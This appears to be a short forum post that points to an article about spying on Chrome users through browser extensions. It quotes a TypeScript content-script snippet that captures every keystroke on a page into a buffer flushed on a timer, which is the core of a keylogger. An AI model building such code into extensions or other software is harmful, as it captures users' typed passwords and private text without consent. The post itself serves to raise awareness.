- This topic is empty.
Anyone can join our Discord free of charge.
this was incredibly eye-opening on Hacker News
https://mattfrisbie.substack.com/p/spy-chrome-extension
insane how easy to spy on Chrome users!
You can even put a keylogger
Keylogger
With a content script running on every page, reading keystrokes is dead easy. Creating a keystroke buffer that is periodically flushed will give us nice consecutive keystrokes that are easy to read.
his code snippet
let buffer = "";
const debouncedCaptureKeylogBuffer = _.debounce(async () => {
if (buffer.length > 0) {
// Flush the buffer
buffer = "";
}
}, 1000);
document.addEventListener("keyup", (e: KeyboardEvent) => {
buffer += e.key;
debouncedCaptureKeylogBuffer();
});
If you want the LittleBizzy team to setup your SlickStack cloud server for you and migrate all your data, we can do it for a fixed price at the below link. If you're not satisfied, request a 100% refund anytime you want (no questions asked).
We champion core values like free speech, transparency, and portability, and welcome anyone else who does too.
Here is a non-exhaustive list of plugins, themes, and other services that we recommend checking out.
Every stack script and server deployment platform is a bit different, so check to see how SlickStack compares.
Here’s some of the incredible performance features you can expect after launching your SlickStack cloud VPS.
If you are wondering what specific problems SlickStack can help solve, browse some of the solutions below.
In lieu of donations, please show your support by mentioning SlickStack on your blog or write a review. Thank you!